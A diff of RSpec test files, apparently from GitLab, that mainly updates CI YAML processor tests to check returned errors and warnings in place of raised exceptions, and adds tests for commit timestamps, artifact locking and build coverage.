context 'when jobs config is nil' do
let(:config) { nil }
it { is_expected.to eq({}) }
end
end
end

View File

@ -312,7 +312,7 @@ RSpec.describe Gitlab::Ci::Config do
HEREDOC
end
it 'raises error YamlProcessor validationError' do
it 'raises ConfigError' do
expect { config }.to raise_error(
described_class::ConfigError,
"Included file `invalid` does not have YAML extension!"
@ -329,7 +329,7 @@ RSpec.describe Gitlab::Ci::Config do
HEREDOC
end
it 'raises error YamlProcessor validationError' do
it 'raises ConfigError' do
expect { config }.to raise_error(
described_class::ConfigError,
'Include `{"remote":"http://url","local":"/local/file.yml"}` needs to match exactly one accessor!'

View File

@ -157,7 +157,7 @@ RSpec.describe Gitlab::Ci::Lint do
it 'uses YamlProcessor' do
expect(Gitlab::Ci::YamlProcessor)
.to receive(:new_with_validation_errors)
.to receive(:new)
.and_call_original
subject

View File

@ -31,20 +31,20 @@ RSpec.describe Gitlab::Ci::Pipeline::Chain::Validate::External do
CI_YAML
end
let(:yaml_processor) do
let(:yaml_processor_result) do
::Gitlab::Ci::YamlProcessor.new(
ci_yaml, {
project: project,
sha: pipeline.sha,
user: user
}
)
).execute
end
let(:save_incompleted) { true }
let(:command) do
Gitlab::Ci::Pipeline::Chain::Command.new(
project: project, current_user: user, config_processor: yaml_processor, save_incompleted: save_incompleted
project: project, current_user: user, config_processor: yaml_processor_result, save_incompleted: save_incompleted
)
end

View File

@ -3,7 +3,7 @@
require 'spec_helper'
RSpec.describe 'CI YML Templates' do
subject { Gitlab::Ci::YamlProcessor.new(content) }
subject { Gitlab::Ci::YamlProcessor.new(content).execute }
let(:all_templates) { Gitlab::Template::GitlabCiYmlTemplate.all.map(&:full_name) }
@ -33,7 +33,7 @@ RSpec.describe 'CI YML Templates' do
end
it 'is valid' do
expect { subject }.not_to raise_error
expect(subject).to be_valid
end
it 'require default stages to be included' do

View File

@ -7,16 +7,16 @@ module Gitlab
RSpec.describe YamlProcessor do
include StubRequests
subject { described_class.new(config, user: nil) }
subject { described_class.new(config, user: nil).execute }
shared_examples 'returns errors' do |error_message|
it 'raises exception when error encountered' do
expect { subject }.to raise_error(described_class::ValidationError, error_message)
it 'adds a message when an error is encountered' do
expect(subject.errors).to include(error_message)
end
end
describe '#build_attributes' do
subject { described_class.new(config, user: nil).build_attributes(:rspec) }
subject { described_class.new(config, user: nil).execute.build_attributes(:rspec) }
describe 'attributes list' do
let(:config) do
@ -98,7 +98,7 @@ module Gitlab
config = YAML.dump({ default: { tags: %w[A B] },
rspec: { script: "rspec" } })
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -145,7 +145,7 @@ module Gitlab
config = YAML.dump({ default: { interruptible: true },
rspec: { script: "rspec" } })
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -474,9 +474,8 @@ module Gitlab
end
it 'is propagated all the way up into the raised exception' do
expect { subject }.to raise_error do |error|
expect(error.warnings).to contain_exactly(/jobs:rspec may allow multiple pipelines to run/)
end
expect(subject).not_to be_valid
expect(subject.warnings).to contain_exactly(/jobs:rspec may allow multiple pipelines to run/)
end
it_behaves_like 'returns errors', 'jobs:invalid:artifacts config should be a hash'
@ -493,10 +492,8 @@ module Gitlab
EOYML
end
it 'raises an exception with empty warnings array' do
expect { subject }.to raise_error do |error|
expect(error.warnings).to be_empty
end
it 'has empty warnings' do
expect(subject.warnings).to be_empty
end
it_behaves_like 'returns errors', 'Local file `unknown/file.yml` does not have project!'
@ -504,12 +501,9 @@ module Gitlab
context 'when error is raised after composing the config with warnings' do
shared_examples 'has warnings and expected error' do |error_message|
it 'raises an exception including warnings' do
expect { subject }.to raise_error do |error|
expect(error).to be_a(described_class::ValidationError)
expect(error.message).to match(error_message)
expect(error.warnings).to be_present
end
it 'returns errors and warnings', :aggregate_failures do
expect(subject.errors).to include(error_message)
expect(subject.warnings).to be_present
end
end
@ -590,7 +584,7 @@ module Gitlab
context 'when `only` has an invalid value' do
let(:config) { { rspec: { script: "rspec", type: "test", only: only } } }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
context 'when it is integer' do
let(:only) { 1 }
@ -614,7 +608,7 @@ module Gitlab
context 'when `except` has an invalid value' do
let(:config) { { rspec: { script: "rspec", except: except } } }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
context 'when it is integer' do
let(:except) { 1 }
@ -638,7 +632,7 @@ module Gitlab
describe "Scripts handling" do
let(:config_data) { YAML.dump(config) }
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config_data) }
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config_data).execute }
subject { config_processor.stage_builds_attributes('test').first }
@ -807,7 +801,7 @@ module Gitlab
before_script: ["pwd"],
rspec: { script: "rspec" } })
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -840,7 +834,7 @@ module Gitlab
command: ["/usr/local/bin/init", "run"] }, "docker:dind"],
script: "rspec" } })
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -871,7 +865,7 @@ module Gitlab
before_script: ["pwd"],
rspec: { script: "rspec" } })
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -898,7 +892,7 @@ module Gitlab
before_script: ["pwd"],
rspec: { image: "ruby:2.5", services: ["postgresql", "docker:dind"], script: "rspec" } })
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -922,9 +916,9 @@ module Gitlab
end
describe 'Variables' do
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
subject { config_processor.builds.first[:yaml_variables] }
let(:build_variables) { subject.builds.first[:yaml_variables] }
context 'when global variables are defined' do
let(:variables) do
@ -940,7 +934,7 @@ module Gitlab
end
it 'returns global variables' do
expect(subject).to contain_exactly(
expect(build_variables).to contain_exactly(
{ key: 'VAR1', value: 'value1', public: true },
{ key: 'VAR2', value: 'value2', public: true }
)
@ -968,7 +962,7 @@ module Gitlab
let(:inherit) { }
it 'returns all unique variables' do
expect(subject).to contain_exactly(
expect(build_variables).to contain_exactly(
{ key: 'VAR4', value: 'global4', public: true },
{ key: 'VAR3', value: 'global3', public: true },
{ key: 'VAR1', value: 'value1', public: true },
@ -981,7 +975,7 @@ module Gitlab
let(:inherit) { { variables: false } }
it 'does not inherit variables' do
expect(subject).to contain_exactly(
expect(build_variables).to contain_exactly(
{ key: 'VAR1', value: 'value1', public: true },
{ key: 'VAR2', value: 'value2', public: true }
)
@ -992,7 +986,7 @@ module Gitlab
let(:inherit) { { variables: %w[VAR1 VAR4] } }
it 'returns all unique variables and inherits only specified variables' do
expect(subject).to contain_exactly(
expect(build_variables).to contain_exactly(
{ key: 'VAR4', value: 'global4', public: true },
{ key: 'VAR1', value: 'value1', public: true },
{ key: 'VAR2', value: 'value2', public: true }
@ -1015,7 +1009,7 @@ module Gitlab
end
it 'returns job variables' do
expect(subject).to contain_exactly(
expect(build_variables).to contain_exactly(
{ key: 'VAR1', value: 'value1', public: true },
{ key: 'VAR2', value: 'value2', public: true }
)
@ -1041,8 +1035,8 @@ module Gitlab
# When variables config is empty, we assume this is a valid
# configuration, see issue #18775
#
expect(subject).to be_an_instance_of(Array)
expect(subject).to be_empty
expect(build_variables).to be_an_instance_of(Array)
expect(build_variables).to be_empty
end
end
end
@ -1057,14 +1051,14 @@ module Gitlab
end
it 'returns empty array' do
expect(subject).to be_an_instance_of(Array)
expect(subject).to be_empty
expect(build_variables).to be_an_instance_of(Array)
expect(build_variables).to be_empty
end
end
end
context 'when using `extends`' do
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config) }
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config).execute }
subject { config_processor.builds.first }
@ -1126,15 +1120,13 @@ module Gitlab
}
end
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config), opts) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config), opts).execute }
context "when validating a ci config file with no project context" do
context "when a single string is provided" do
let(:include_content) { "/local.gitlab-ci.yml" }
it "returns a validation error" do
expect { subject }.to raise_error /does not have project/
end
it_behaves_like 'returns errors', /does not have project/
end
context "when an array is provided" do
@ -1165,9 +1157,7 @@ module Gitlab
body: 'prepare: { script: ls -al }')
end
it "does not return any error" do
expect { subject }.not_to raise_error
end
it { is_expected.to be_valid }
end
context "when the include type is incorrect" do
@ -1188,9 +1178,7 @@ module Gitlab
.and_return(YAML.dump({ job1: { script: 'hello' } }))
end
it "does not return an error" do
expect { subject }.not_to raise_error
end
it { is_expected.to be_valid }
end
context "when the included internal file is not present" do
@ -1206,7 +1194,7 @@ module Gitlab
rspec: { script: 'rspec', when: when_state }
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
builds = config_processor.stage_builds_attributes("test")
expect(builds.size).to eq(1)
@ -1250,7 +1238,7 @@ module Gitlab
variables: { 'VAR1' => 1 } })
end
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config) }
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config).execute }
let(:builds) { config_processor.stage_builds_attributes('test') }
context 'when job is parallelized' do
@ -1366,7 +1354,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first[:cache]).to eq(
@ -1388,7 +1376,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first[:cache]).to eq(
@ -1407,7 +1395,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes('test').size).to eq(1)
expect(config_processor.stage_builds_attributes('test').first[:cache]).to eq(
@ -1430,7 +1418,7 @@ module Gitlab
}
)
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes('test').size).to eq(1)
expect(config_processor.stage_builds_attributes('test').first[:cache]).to eq(
@ -1453,7 +1441,7 @@ module Gitlab
}
)
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes('test').size).to eq(1)
expect(config_processor.stage_builds_attributes('test').first[:cache]).to eq(
@ -1473,7 +1461,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first[:cache]).to eq(
@ -1503,7 +1491,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
expect(config_processor.stage_builds_attributes("test").size).to eq(1)
expect(config_processor.stage_builds_attributes("test").first).to eq({
@ -1539,7 +1527,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
builds = config_processor.stage_builds_attributes("test")
expect(builds.size).to eq(1)
@ -1555,7 +1543,7 @@ module Gitlab
}
})
config_processor = Gitlab::Ci::YamlProcessor.new(config)
config_processor = Gitlab::Ci::YamlProcessor.new(config).execute
builds = config_processor.stage_builds_attributes("test")
expect(builds.size).to eq(1)
@ -1591,14 +1579,14 @@ module Gitlab
- my/test/something
YAML
attributes = Gitlab::Ci::YamlProcessor.new(config).build_attributes('test')
attributes = Gitlab::Ci::YamlProcessor.new(config).execute.build_attributes('test')
expect(attributes.dig(*%i[options artifacts exclude])).to eq(%w[my/test/something])
end
end
describe "release" do
let(:processor) { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
let(:processor) { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
let(:config) do
{
stages: %w[build test release],
@ -1643,7 +1631,7 @@ module Gitlab
}
end
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
let(:builds) { subject.stage_builds_attributes('deploy') }
@ -1753,7 +1741,7 @@ module Gitlab
}
end
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
let(:builds) { subject.stage_builds_attributes('deploy') }
@ -1795,24 +1783,24 @@ module Gitlab
}
end
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
context 'no dependencies' do
let(:dependencies) { }
it { expect { subject }.not_to raise_error }
it { is_expected.to be_valid }
end
context 'dependencies to builds' do
let(:dependencies) { %w(build1 build2) }
it { expect { subject }.not_to raise_error }
it { is_expected.to be_valid }
end
context 'dependencies to builds defined as symbols' do
let(:dependencies) { [:build1, :build2] }
it { expect { subject }.not_to raise_error }
it { is_expected.to be_valid }
end
context 'undefined dependency' do
@ -1868,10 +1856,10 @@ module Gitlab
}
end
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
context 'no needs' do
it { expect { subject }.not_to raise_error }
it { is_expected.to be_valid }
end
context 'needs two builds' do
@ -2063,7 +2051,7 @@ module Gitlab
end
context 'with when/rules conflict' do
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)) }
subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute }
let(:config) do
{
@ -2079,9 +2067,7 @@ module Gitlab
}
end
it 'raises no exceptions' do
expect { subject }.not_to raise_error
end
it { is_expected.to be_valid }
it 'returns all jobs regardless of their inclusion' do
expect(subject.builds.count).to eq(config.keys.count)
@ -2120,7 +2106,7 @@ module Gitlab
end
describe "Hidden jobs" do
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config) }
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config).execute }
subject { config_processor.stage_builds_attributes("test") }
@ -2167,7 +2153,7 @@ module Gitlab
end
describe "YAML Alias/Anchor" do
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config) }
let(:config_processor) { Gitlab::Ci::YamlProcessor.new(config).execute }
subject { config_processor.stage_builds_attributes("build") }
@ -2264,7 +2250,7 @@ module Gitlab
})
end
it { expect { subject }.not_to raise_error }
it { is_expected.to be_valid }
end
context 'when job is not specified specified while artifact is' do
@ -2277,11 +2263,7 @@ module Gitlab
})
end
it do
expect { subject }.to raise_error(
described_class::ValidationError,
/include config must specify the job where to fetch the artifact from/)
end
it_behaves_like 'returns errors', /include config must specify the job where to fetch the artifact from/
end
context 'when include is a string' do
@ -2297,12 +2279,12 @@ module Gitlab
})
end
it { expect { subject }.not_to raise_error }
it { is_expected.to be_valid }
end
end
describe "Error handling" do
subject { described_class.new(config) }
subject { described_class.new(config).execute }
context 'when YAML syntax is invalid' do
let(:config) { 'invalid: yaml: test' }
@ -2651,8 +2633,8 @@ module Gitlab
end
end
describe '.new_with_validation_errors' do
subject { Gitlab::Ci::YamlProcessor.new_with_validation_errors(content) }
describe '#execute' do
subject { Gitlab::Ci::YamlProcessor.new(content).execute }
context 'when the YAML could not be parsed' do
let(:content) { YAML.dump('invalid: yaml: test') }
@ -2660,7 +2642,6 @@ module Gitlab
it 'returns errors and empty configuration' do
expect(subject.valid?).to eq(false)
expect(subject.errors).to eq(['Invalid configuration format'])
expect(subject.config).to be_blank
end
end
@ -2670,7 +2651,6 @@ module Gitlab
it 'returns errors and empty configuration' do
expect(subject.valid?).to eq(false)
expect(subject.errors).to eq(['jobs:rspec:tags config should be an array of strings'])
expect(subject.config).to be_blank
end
end
@ -2682,7 +2662,6 @@ module Gitlab
expect(subject.errors).to contain_exactly(
'jobs:rspec config contains unknown keys: bad_tags',
'jobs:rspec rules should be an array of hashes')
expect(subject.config).to be_blank
end
end
@ -2692,7 +2671,6 @@ module Gitlab
it 'returns errors and empty configuration' do
expect(subject.valid?).to eq(false)
expect(subject.errors).to eq(['Please provide content of .gitlab-ci.yml'])
expect(subject.config).to be_blank
end
end
@ -2702,7 +2680,6 @@ module Gitlab
it 'returns errors and empty configuration' do
expect(subject.valid?).to eq(false)
expect(subject.errors).to eq(['Unknown alias: bad_alias'])
expect(subject.config).to be_blank
end
end
@ -2712,7 +2689,7 @@ module Gitlab
it 'returns errors and empty configuration' do
expect(subject.valid?).to eq(true)
expect(subject.errors).to be_empty
expect(subject.config).to be_present
expect(subject.builds).to be_present
end
end
end

View File

@ -133,12 +133,6 @@ RSpec.describe Gitlab::ImportExport::FastHashSerializer do
expect(builds_count).to eq(1)
end
it 'has no when YML attributes but only the DB column' do
expect_any_instance_of(Gitlab::Ci::YamlProcessor).not_to receive(:build_attributes)
subject
end
it 'has pipeline commits' do
expect(subject['ci_pipelines']).not_to be_empty
end

View File

@ -381,12 +381,6 @@ RSpec.describe Gitlab::ImportExport::Project::TreeSaver do
expect(project_tree_saver.save).to be true
end
it 'has no when YML attributes but only the DB column' do
expect_any_instance_of(Gitlab::Ci::YamlProcessor).not_to receive(:build_attributes)
project_tree_saver.save
end
end
end

View File

@ -0,0 +1,14 @@
# frozen_string_literal: true
require 'spec_helper'
RSpec.describe Analytics::InstanceStatistics::Measurement, type: :model do
describe 'validation' do
let!(:measurement) { create(:instance_statistics_measurement) }
it { is_expected.to validate_presence_of(:recorded_at) }
it { is_expected.to validate_presence_of(:identifier) }
it { is_expected.to validate_presence_of(:count) }
it { is_expected.to validate_uniqueness_of(:recorded_at).scoped_to(:identifier) }
end
end

View File

@ -50,6 +50,7 @@ RSpec.describe Ci::Bridge do
CI_PROJECT_PATH_SLUG CI_PROJECT_NAMESPACE CI_PROJECT_ROOT_NAMESPACE
CI_PIPELINE_IID CI_CONFIG_PATH CI_PIPELINE_SOURCE CI_COMMIT_MESSAGE
CI_COMMIT_TITLE CI_COMMIT_DESCRIPTION CI_COMMIT_REF_PROTECTED
CI_COMMIT_TIMESTAMP
]
expect(bridge.scoped_variables_hash.keys).to include(*variables)

View File

@ -612,6 +612,46 @@ RSpec.describe Ci::Build do
end
end
describe '#locked_artifacts?' do
subject(:locked_artifacts) { build.locked_artifacts? }
context 'when pipeline is artifacts_locked' do
before do
build.pipeline.artifacts_locked!
end
context 'artifacts archive does not exist' do
let(:build) { create(:ci_build) }
it { is_expected.to be_falsy }
end
context 'artifacts archive exists' do
let(:build) { create(:ci_build, :artifacts) }
it { is_expected.to be_truthy }
end
end
context 'when pipeline is unlocked' do
before do
build.pipeline.unlocked!
end
context 'artifacts archive does not exist' do
let(:build) { create(:ci_build) }
it { is_expected.to be_falsy }
end
context 'artifacts archive exists' do
let(:build) { create(:ci_build, :artifacts) }
it { is_expected.to be_falsy }
end
end
end
describe '#available_artifacts?' do
let(:build) { create(:ci_build) }
@ -2329,6 +2369,7 @@ RSpec.describe Ci::Build do
{ key: 'CI_COMMIT_TITLE', value: pipeline.git_commit_title, public: true, masked: false },
{ key: 'CI_COMMIT_DESCRIPTION', value: pipeline.git_commit_description, public: true, masked: false },
{ key: 'CI_COMMIT_REF_PROTECTED', value: (!!pipeline.protected_ref?).to_s, public: true, masked: false },
{ key: 'CI_COMMIT_TIMESTAMP', value: pipeline.git_commit_timestamp, public: true, masked: false },
{ key: 'CI_BUILD_REF', value: build.sha, public: true, masked: false },
{ key: 'CI_BUILD_BEFORE_SHA', value: build.before_sha, public: true, masked: false },
{ key: 'CI_BUILD_REF_NAME', value: build.ref, public: true, masked: false },

View File

@ -715,6 +715,7 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do
CI_COMMIT_TITLE
CI_COMMIT_DESCRIPTION
CI_COMMIT_REF_PROTECTED
CI_COMMIT_TIMESTAMP
CI_BUILD_REF
CI_BUILD_BEFORE_SHA
CI_BUILD_REF_NAME
@ -3440,4 +3441,17 @@ RSpec.describe Ci::Pipeline, :mailer, factory_default: :keep do
it { is_expected.to eq(Gitlab::Git::TAG_REF_PREFIX + pipeline.source_ref.to_s) }
end
end
describe "#builds_with_coverage" do
it 'returns builds with coverage only' do
rspec = create(:ci_build, name: 'rspec', coverage: 97.1, pipeline: pipeline)
jest = create(:ci_build, name: 'jest', coverage: 94.1, pipeline: pipeline)
karma = create(:ci_build, name: 'karma', coverage: nil, pipeline: pipeline)
builds = pipeline.builds_with_coverage
expect(builds).to include(rspec, jest)
expect(builds).not_to include(karma)
end
end
end

View File

@ -4112,4 +4112,14 @@ RSpec.describe MergeRequest, factory_default: :keep do
expect(context[:label_url_method]).to eq(:project_merge_requests_url)
end
end
describe '#head_pipeline_builds_with_coverage' do
it 'delegates to head_pipeline' do
expect(subject)
.to delegate_method(:builds_with_coverage)
.to(:head_pipeline)
.with_prefix
.with_arguments(allow_nil: true)
end
end
end

View File

@ -329,6 +329,13 @@ RSpec.describe API::ProjectSnippets do
expect(snippet.description).to eq(new_description)
end
it 'updates snippet with visibility parameter' do
expect { update_snippet(params: { visibility: 'private' }) }
.to change { snippet.reload.visibility }
expect(snippet.visibility).to eq('private')
end
it 'returns 404 for invalid snippet id' do
update_snippet(snippet_id: non_existing_record_id, params: { title: 'foo' })
@ -340,6 +347,7 @@ RSpec.describe API::ProjectSnippets do
update_snippet
expect(response).to have_gitlab_http_status(:bad_request)
expect(json_response['error']).to eq 'title, file_name, content, visibility are missing, at least one parameter must be provided'
end
it 'returns 400 if content is blank' do

View File

@ -188,25 +188,31 @@ RSpec.describe BuildDetailsEntity do
context 'when the build has expired artifacts' do
let!(:build) { create(:ci_build, :artifacts, artifacts_expire_at: 7.days.ago) }
it 'does not expose any artifact actions path' do
expect(subject[:artifact].keys).not_to include(:download_path, :browse_path, :keep_path)
end
context 'when pipeline is unlocked' do
before do
build.pipeline.unlocked!
end
it 'artifact locked is false' do
expect(subject.dig(:artifact, :locked)).to eq(false)
it 'artifact locked is false' do
expect(subject.dig(:artifact, :locked)).to eq(false)
end
it 'does not expose any artifact actions path' do
expect(subject[:artifact].keys).not_to include(:download_path, :browse_path, :keep_path)
end
end
context 'when the pipeline is artifacts_locked' do
before do
build.pipeline.update!(locked: :artifacts_locked)
build.pipeline.artifacts_locked!
end
it 'artifact locked is true' do
expect(subject.dig(:artifact, :locked)).to eq(true)
end
it 'exposes download and browse artifact actions path' do
expect(subject[:artifact].keys).to include(:download_path, :browse_path)
it 'exposes download, browse and keep artifact actions path' do
expect(subject[:artifact].keys).to include(:download_path, :browse_path, :keep_path)
end
end
end

View File

@ -285,4 +285,20 @@ RSpec.describe MergeRequestPollWidgetEntity do
end
end
end
describe '#builds_with_coverage' do
it 'serializes the builds with coverage' do
allow(resource).to receive(:head_pipeline_builds_with_coverage).and_return([
double(name: 'rspec', coverage: 91.5),
double(name: 'jest', coverage: 94.1)
])
result = subject[:builds_with_coverage]
expect(result).to eq([
{ name: 'rspec', coverage: 91.5 },
{ name: 'jest', coverage: 94.1 }
])
end
end
end

View File

@ -11,6 +11,10 @@ RSpec.describe Ci::DestroyExpiredJobArtifactsService, :clean_gitlab_redis_shared
let(:service) { described_class.new }
let!(:artifact) { create(:ci_job_artifact, expire_at: 1.day.ago) }
before do
artifact.job.pipeline.unlocked!
end
context 'when artifact is expired' do
context 'when artifact is not locked' do
before do
@ -88,6 +92,8 @@ RSpec.describe Ci::DestroyExpiredJobArtifactsService, :clean_gitlab_redis_shared
before do
stub_const('Ci::DestroyExpiredJobArtifactsService::LOOP_LIMIT', 1)
stub_const('Ci::DestroyExpiredJobArtifactsService::BATCH_SIZE', 1)
second_artifact.job.pipeline.unlocked!
end
let!(:second_artifact) { create(:ci_job_artifact, expire_at: 1.day.ago) }
@ -102,7 +108,9 @@ RSpec.describe Ci::DestroyExpiredJobArtifactsService, :clean_gitlab_redis_shared
end
context 'when there are no artifacts' do
let!(:artifact) { }
before do
artifact.destroy!
end
it 'does not raise error' do
expect { subject }.not_to raise_error
@ -112,6 +120,8 @@ RSpec.describe Ci::DestroyExpiredJobArtifactsService, :clean_gitlab_redis_shared
context 'when there are artifacts more than batch sizes' do
before do
stub_const('Ci::DestroyExpiredJobArtifactsService::BATCH_SIZE', 1)
second_artifact.job.pipeline.unlocked!
end
let!(:second_artifact) { create(:ci_job_artifact, expire_at: 1.day.ago) }
@ -126,6 +136,10 @@ RSpec.describe Ci::DestroyExpiredJobArtifactsService, :clean_gitlab_redis_shared
let!(:pipeline_artifact_1) { create(:ci_pipeline_artifact, expire_at: 1.week.ago) }
let!(:pipeline_artifact_2) { create(:ci_pipeline_artifact, expire_at: 1.week.ago) }
before do
[pipeline_artifact_1, pipeline_artifact_2].each { |pipeline_artifact| pipeline_artifact.pipeline.unlocked! }
end
it 'destroys pipeline artifacts' do
expect { subject }.to change { Ci::PipelineArtifact.count }.by(-2)
end
@ -135,10 +149,26 @@ RSpec.describe Ci::DestroyExpiredJobArtifactsService, :clean_gitlab_redis_shared
let!(:pipeline_artifact_1) { create(:ci_pipeline_artifact, expire_at: 2.days) }
let!(:pipeline_artifact_2) { create(:ci_pipeline_artifact, expire_at: 2.days) }
it 'do not destroy pipeline artifacts' do
before do
[pipeline_artifact_1, pipeline_artifact_2].each { |pipeline_artifact| pipeline_artifact.pipeline.unlocked! }
end
it 'does not destroy pipeline artifacts' do
expect { subject }.not_to change { Ci::PipelineArtifact.count }
end
end
end
context 'when some artifacts are locked' do
before do
pipeline = create(:ci_pipeline, locked: :artifacts_locked)
job = create(:ci_build, pipeline: pipeline)
create(:ci_job_artifact, expire_at: 1.day.ago, job: job)
end
it 'destroys only unlocked artifacts' do
expect { subject }.to change { Ci::JobArtifact.count }.by(-1)
end
end
end
end